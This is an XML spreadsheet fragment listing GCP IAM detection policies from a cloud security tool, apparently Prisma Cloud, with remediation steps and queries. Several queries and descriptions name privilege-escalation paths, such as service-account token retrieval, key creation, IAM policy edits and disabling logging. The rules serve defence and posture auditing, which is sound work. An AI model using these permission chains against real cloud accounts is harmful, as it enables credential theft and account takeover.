        </is>
      </c>
      <c r="AG32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1" t="inlineStr">
        <is>
          <t>ec3f5960-dcbc-4704-ac37-ed1a03ff59b6</t>
        </is>
      </c>
      <c r="AI3291" t="inlineStr">
        <is>
          <t>ec3f5960-dcbc-4704-ac37-ed1a03ff59b6</t>
        </is>
      </c>
      <c r="AJ3291" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3291" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3292">
      <c r="A3292" t="inlineStr"/>
      <c r="B3292" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3292" s="2" t="inlineStr"/>
      <c r="D3292" t="n">
        <v>1182</v>
      </c>
      <c r="E3292" t="n">
        <v>182</v>
      </c>
      <c r="F3292" t="n">
        <v>626</v>
      </c>
      <c r="G3292" t="b">
        <v>1</v>
      </c>
      <c r="H3292" t="inlineStr">
        <is>
          <t>ALERT ALL test, Audit jmontufar, Azure AKS cluster Azure CNI networking not enabled, AzureDriftDetection, BG-AH-Email-Test, BPtestTag, Borse,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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3292" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3292" t="inlineStr">
        <is>
          <t>GCP Compute Engine with IAM write access level</t>
        </is>
      </c>
      <c r="L3292" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3292" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3292" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3292" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3292" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3292" t="inlineStr"/>
      <c r="R3292" t="inlineStr"/>
      <c r="S3292" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3292" t="b">
        <v>0</v>
      </c>
      <c r="U3292" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3292" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3292" t="inlineStr">
        <is>
          <t>This policy identifies IAM write permissions that are defined as risky permissions. Ensure that the Compute Engine entities in your GCP account don't have a risky set of write permissions to minimize security risks.</t>
        </is>
      </c>
      <c r="X3292" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the GCP console
2. Navigate to the Compute Engine instance 
3. Find the service account used by the Compute Engine instance
4. Navigate to the IAM service
5. Find the binding between the service account used by the Compute Engine instance and the role with risky permissions
6. Remove the binding
7. Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y3292" t="inlineStr"/>
      <c r="Z3292" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.service.name = 'compute' and source.cloud.resource.type = 'Instances' and action.name in ('accessapproval.requests.approve','accessapproval.requests.dismiss','accessapproval.settings.delete','accessapproval.settings.update','accesscontextmanager.accessLevels.create','accesscontextmanager.accessLevels.delete','accesscontextmanager.accessLevels.replaceAll','accesscontextmanager.accessLevels.update','accesscontextmanager.accessPolicies.create','accesscontextmanager.accessPolicies.delete','accesscontextmanager.accessPolicies.setIamPolicy','accesscontextmanager.accessPolicies.update','accesscontextmanager.gcpUserAccessBindings.create','accesscontextmanager.gcpUserAccessBindings.delete','accesscontextmanager.gcpUserAccessBindings.update','accesscontextmanager.policies.create','accesscontextmanager.policies.delete','accesscontextmanager.policies.setIamPolicy','accesscontextmanager.policies.update','iam.roles.create','iam.roles.delete','iam.roles.undelete', 'iam.roles.update','iam.serviceAccounts.getAccessToken','iam.serviceAccountKeys.create','iam.serviceAccountKeys.delete','iam.serviceAccounts.create','iam.serviceAccounts.delete','iam.serviceAccounts.disable','iam.serviceAccounts.enable','iam.serviceAccounts.setIamPolicy','iam.serviceAccounts.undelete','iam.serviceAccounts.update','iam.serviceAccounts.implicitDelegation','iam.serviceAccounts.signBlob','iam.serviceAccounts.signJwt','iam.serviceAccounts.actAs','compute.backendServices.setIamPolicy','compute.disks.removeResourcePolicies','compute.disks.setIamPolicy','compute.firewallPolicies.setIamPolicy','compute.globalOperations.setIamPolicy','compute.images.setIamPolicy','compute.instanceTemplates.setIamPolicy','compute.instances.removeResourcePolicies','compute.instances.setIamPolicy','compute.instances.setServiceAccount','compute.machineImages.setIamPolicy','compute.maintenancePolicies.setIamPolicy','compute.snapshots.setIamPolicy')</t>
        </is>
      </c>
      <c r="AA3292" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3292" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3292" t="inlineStr"/>
      <c r="AD3292" t="b">
        <v>1</v>
      </c>
      <c r="AE3292" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3292" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG329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Borse - Notifications:, AccountGroups:AWS Cloud willixmorax,Account Group - Cloud Discovery - Zw,test ac grp,test1_account_group_20231006,compute-zw-rbac;,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2" t="inlineStr">
        <is>
          <t>dc8041dd-f95d-4b77-8b49-9e1f0be184d9</t>
        </is>
      </c>
      <c r="AI3292" t="inlineStr">
        <is>
          <t>dc8041dd-f95d-4b77-8b49-9e1f0be184d9</t>
        </is>
      </c>
      <c r="AJ3292" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3292" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3293">
      <c r="A3293" t="inlineStr"/>
      <c r="B3293" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3293" s="2" t="inlineStr"/>
      <c r="D3293" t="n">
        <v>0</v>
      </c>
      <c r="E3293" t="n">
        <v>0</v>
      </c>
      <c r="F3293" t="n">
        <v>560</v>
      </c>
      <c r="G3293" t="b">
        <v>1</v>
      </c>
      <c r="H32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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3293" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3293" t="inlineStr">
        <is>
          <t>GCP Users and Machine Identities with IAM Metadata Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3293" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3293" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3293" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3293" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3293" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3293" t="inlineStr"/>
      <c r="R3293" t="inlineStr"/>
      <c r="S3293" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3293" t="b">
        <v>1</v>
      </c>
      <c r="U3293" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3293" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3293" t="inlineStr">
        <is>
          <t>This policy identifies GCP Users with Stale Metadata Write Permissions. Google Cloud Platform (GCP) uses IAM (Identity and Access Management) for access control. Unused GCP user accounts or machine identities with "Metadata Write" permissions for 90 days pose a security risk:
Lingering Threat: An attacker could exploit inactive credentials to gain access. Metadata Write allows modifying instance metadata, potentially enabling them to steal data or install malware.
Privilege Escalation Risk: With Metadata Write access, attackers might manipulate metadata to elevate their privileges and gain further control over your GCP resources.
Unused privileged accounts are attractive targets. Here's how to mitigate the risk:
Routine Review: Regularly identify and disable unused GCP user accounts and machine identities with Metadata Write permissions.
Least Privilege Principle: Grant "Metadata Write" only when absolutely necessary and for a limited time. Use IAM policies to grant granular permissions.
MFA Enforcement: Enforce Multi-Factor Authentication (MFA) to add an extra layer of security, especially for service accounts with high-level permissions.</t>
        </is>
      </c>
      <c r="X3293"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9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3" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and action.access.level = 'Metadata Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3293" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3293" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3293" t="inlineStr"/>
      <c r="AD3293" t="b">
        <v>1</v>
      </c>
      <c r="AE3293" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3293" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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3" t="inlineStr">
        <is>
          <t>135604ed-6419-49bb-adab-4311434a21e1</t>
        </is>
      </c>
      <c r="AI3293" t="inlineStr">
        <is>
          <t>135604ed-6419-49bb-adab-4311434a21e1</t>
        </is>
      </c>
      <c r="AJ3293" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3293" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3294">
      <c r="A3294" t="inlineStr"/>
      <c r="B3294" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3294" s="2" t="inlineStr"/>
      <c r="D3294" t="inlineStr"/>
      <c r="E3294" t="inlineStr"/>
      <c r="F3294" t="inlineStr"/>
      <c r="G3294" t="b">
        <v>1</v>
      </c>
      <c r="H32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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3294" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3294" t="inlineStr">
        <is>
          <t>GCP users with 'Owner' role on org level</t>
        </is>
      </c>
      <c r="L3294" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3294" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3294" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3294" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3294" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3294" t="inlineStr"/>
      <c r="R3294" t="inlineStr"/>
      <c r="S3294" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3294" t="b">
        <v>0</v>
      </c>
      <c r="U3294" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3294" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3294" t="inlineStr">
        <is>
          <t>This policy identifies GCP basic role 'Owner' on organization level that is defined as risky role. Ensure that the users in your GCP environment don't have a risky 'Owner' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3294" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant organization
 3. Navigate to the IAM service
 4. Find the binding between the user  and the "Owner" role
 5. Remove the binding
 6. Create a new binding with a least privileged predefined or custom role, if necessary.</t>
        </is>
      </c>
      <c r="Y3294" t="inlineStr"/>
      <c r="Z3294" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.resource.type = 'user' and grantedby.cloud.policy.name = 'Owner' and grantedby.level.type = 'GCP Organization'</t>
        </is>
      </c>
      <c r="AA3294" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3294" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3294" t="inlineStr"/>
      <c r="AD3294" t="b">
        <v>1</v>
      </c>
      <c r="AE3294" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3294" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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4" t="inlineStr">
        <is>
          <t>39462006-ccc1-4f0a-991a-898f3f8906fc</t>
        </is>
      </c>
      <c r="AI3294" t="inlineStr">
        <is>
          <t>39462006-ccc1-4f0a-991a-898f3f8906fc</t>
        </is>
      </c>
      <c r="AJ3294" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3294" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3295">
      <c r="A3295" t="inlineStr"/>
      <c r="B3295" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3295" s="2" t="inlineStr"/>
      <c r="D3295" t="inlineStr"/>
      <c r="E3295" t="inlineStr"/>
      <c r="F3295" t="inlineStr"/>
      <c r="G3295" t="b">
        <v>1</v>
      </c>
      <c r="H32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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3295" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3295" t="inlineStr">
        <is>
          <t>GCP App Engine Web Service Assigned Permissions to Retrieve Service Account Tokens Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3295" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3295" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3295" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3295" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3295" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3295" t="inlineStr"/>
      <c r="R3295" t="inlineStr"/>
      <c r="S3295" t="inlineStr"/>
      <c r="T3295" t="b">
        <v>1</v>
      </c>
      <c r="U3295" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3295" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3295" t="inlineStr">
        <is>
          <t>An attacker who successfully exploits a vulnerability or misconfiguration in the web service can leverage the permissions associated with the App Engine service. With the ability to retrieve Service Account tokens could authenticate as high-privileged Service Accounts, escalating their original privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3295" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the App Engine instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y3295"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5" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'appengine' AND action.name CONTAINS ALL ( 'iam.serviceAccounts.getAccessToken', 'iam.serviceAccounts.get' )</t>
        </is>
      </c>
      <c r="AA3295" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3295" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3295" t="inlineStr"/>
      <c r="AD3295" t="b">
        <v>1</v>
      </c>
      <c r="AE3295" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3295" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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5" t="inlineStr">
        <is>
          <t>7399198d-6078-4985-98a2-56d2174b578a</t>
        </is>
      </c>
      <c r="AI3295" t="inlineStr">
        <is>
          <t>7399198d-6078-4985-98a2-56d2174b578a</t>
        </is>
      </c>
      <c r="AJ3295" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3295" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3296">
      <c r="A3296" t="inlineStr"/>
      <c r="B3296" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3296" s="2" t="inlineStr"/>
      <c r="D3296" t="inlineStr"/>
      <c r="E3296" t="inlineStr"/>
      <c r="F3296" t="inlineStr"/>
      <c r="G3296" t="b">
        <v>1</v>
      </c>
      <c r="H32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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3296" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3296" t="inlineStr">
        <is>
          <t>GCP App Engine Web Service Assigned Resource Manager Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3296" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3296" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3296" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3296" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3296" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3296" t="inlineStr"/>
      <c r="R3296" t="inlineStr"/>
      <c r="S3296" t="inlineStr"/>
      <c r="T3296" t="b">
        <v>1</v>
      </c>
      <c r="U3296" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3296" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3296" t="inlineStr">
        <is>
          <t>An attacker who successfully exploits a vulnerability or misconfiguration in the web service can leverage the permissions associated with the App Engine service. With the ability to edit IAM Policies at the organization, folder or project levels they can grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3296" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the App Engine instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y3296"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6" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'appengine' AND action.name IN ('resourcemanager.organizations.setIamPolicy', 'resourcemanager.folders.setIamPolicy', 'resourcemanager.projects.setIamPolicy')</t>
        </is>
      </c>
      <c r="AA3296" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3296" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3296" t="inlineStr"/>
      <c r="AD3296" t="b">
        <v>1</v>
      </c>
      <c r="AE3296" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3296" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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6" t="inlineStr">
        <is>
          <t>b32f7071-4d0e-4bdb-bc96-a5774fcb41bd</t>
        </is>
      </c>
      <c r="AI3296" t="inlineStr">
        <is>
          <t>b32f7071-4d0e-4bdb-bc96-a5774fcb41bd</t>
        </is>
      </c>
      <c r="AJ3296" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3296" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3297">
      <c r="A3297" t="inlineStr"/>
      <c r="B3297" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3297" s="2" t="inlineStr"/>
      <c r="D3297" t="inlineStr"/>
      <c r="E3297" t="inlineStr"/>
      <c r="F3297" t="inlineStr"/>
      <c r="G3297" t="b">
        <v>1</v>
      </c>
      <c r="H32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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3297" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3297" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned Cloud Function IAM Policy Edit Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3297" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3297" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3297" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3297" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3297" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3297" t="inlineStr"/>
      <c r="R3297" t="inlineStr"/>
      <c r="S3297" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3297" t="b">
        <v>1</v>
      </c>
      <c r="U3297" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3297" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3297" t="inlineStr">
        <is>
          <t>An adversary able to edit the IAM policy for Cloud Function instances, in conjunction with Service Account impersonation privileges would be able to escalate their permissions by adding edit permissions to an instance, causing it to perform attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3297" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the VM or Cloud Function instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y3297"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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name CONTAINS ALL ( 'cloudfunctions.functions.setIamPolicy', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3297" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3297" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:53</t>
        </is>
      </c>
      <c r="AC3297" t="inlineStr"/>
      <c r="AD3297" t="b">
        <v>1</v>
      </c>
      <c r="AE3297" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3297" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>14c24888-f3cb-40dc-9a58-a352ee3a2ec6</t>
        </is>
      </c>
      <c r="AI3297" t="inlineStr">
        <is>
          <t>14c24888-f3cb-40dc-9a58-a352ee3a2ec6</t>
        </is>
      </c>
      <c r="AJ3297" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3297" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3298">
      <c r="A3298" t="inlineStr"/>
      <c r="B3298" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3298" s="2" t="inlineStr"/>
      <c r="D3298" t="n">
        <v>0</v>
      </c>
      <c r="E3298" t="n">
        <v>596</v>
      </c>
      <c r="F3298" t="n">
        <v>0</v>
      </c>
      <c r="G3298" t="b">
        <v>1</v>
      </c>
      <c r="H329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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3298" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3298" t="inlineStr">
        <is>
          <t>GCP VM instance with permissions to disrupt logging</t>
        </is>
      </c>
      <c r="L3298" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3298" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3298" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3298" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3298" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3298" t="inlineStr"/>
      <c r="R3298" t="inlineStr"/>
      <c r="S3298" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3298" t="b">
        <v>1</v>
      </c>
      <c r="U3298" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3298" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3298" t="inlineStr">
        <is>
          <t>This IAM policy exerts meticulous control over crucial actions associated with Google Cloud's 'compute' service, focusing on 'Instances' resources. By thoughtfully overseeing capabilities such as managing logging metrics, buckets, logs, and sinks, this policy effectively bolsters the integrity of your cloud environment. By mitigating the potential for unauthorized alterations, this policy thwarts attempts to evade proper event logging during lateral movement, reinforcing the overall security of your GCP infrastructure</t>
        </is>
      </c>
      <c r="X3298"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Repeat if there is a binding of the service account with another Admin role</t>
        </is>
      </c>
      <c r="Y3298"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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'compute' and source.cloud.resource.type = 'Instances' AND action.name IN ('logging.logMetrics.delete', 'logging.logMetrics.update', 'logging.buckets.delete', 'logging.buckets.update', 'logging.logs.delete', 'logging.sinks.delete', 'logging.sinks.update')</t>
        </is>
      </c>
      <c r="AA3298" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3298" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3298" t="inlineStr"/>
      <c r="AD3298" t="b">
        <v>1</v>
      </c>
      <c r="AE3298" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3298" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG329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8" t="inlineStr">
        <is>
          <t>99e41266-184c-428b-9b3c-610f17a4d328</t>
        </is>
      </c>
      <c r="AI3298" t="inlineStr">
        <is>
          <t>99e41266-184c-428b-9b3c-610f17a4d328</t>
        </is>
      </c>
      <c r="AJ3298" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3298" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3299">
      <c r="A3299" t="inlineStr"/>
      <c r="B3299" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3299" s="2" t="inlineStr"/>
      <c r="D3299" t="n">
        <v>0</v>
      </c>
      <c r="E3299" t="n">
        <v>0</v>
      </c>
      <c r="F3299" t="n">
        <v>564</v>
      </c>
      <c r="G3299" t="b">
        <v>1</v>
      </c>
      <c r="H32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299" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3299" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3299" t="inlineStr">
        <is>
          <t>GCP Users and Machine Identities with IAM Metadata Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3299" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3299" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3299" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3299" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3299" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3299" t="inlineStr"/>
      <c r="R3299" t="inlineStr"/>
      <c r="S3299" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3299" t="b">
        <v>1</v>
      </c>
      <c r="U3299" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3299" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3299" t="inlineStr">
        <is>
          <t>This policy identifies GCP Users with Stale Metadata Read Permissions.
Even "apparently harmless" permissions like "Metadata Read" in GCP IAM can be risky if left unused for 90 days. Here's why:
Information Gathering Tool: An attacker could use these credentials to gather information about your GCP environment. This information could include details about project IDs, VM instances, or network configurations. Attackers could exploit this information to identify vulnerabilities or plan further attacks.
Lateral Movement Potential: If attackers compromise an unused GCP user with Metadata Read, they could potentially use it to discover other resources within your GCP project. This could help them move laterally within your environment and gain access to more sensitive data or systems.
While Metadata Read itself doesn't allow direct data manipulation, the information gleaned can be valuable for attackers. Here's how to mitigate the risk:
Regular Review and Removal: Identify and disable unused GCP user accounts and machine identities with any level of Metadata access (Read or Write) on a regular basis.
Principle of Least Privilege: Grant only the minimum permissions required for a user or machine identity to function. Metadata Read might not always be necessary.
Monitor forSuspicious Activity: Utilize Stackdriver Logging to track activity logs, including access attempts for GCP user accounts and service accounts. This can help detect unusual activity related to unused accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3299"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299"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299" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and action.access.level = 'Metadata Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3299" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3299" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3299" t="inlineStr"/>
      <c r="AD3299" t="b">
        <v>1</v>
      </c>
      <c r="AE3299" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3299" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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299" t="inlineStr">
        <is>
          <t>3bdc95d1-a45e-4698-9af8-7e9551cb21b9</t>
        </is>
      </c>
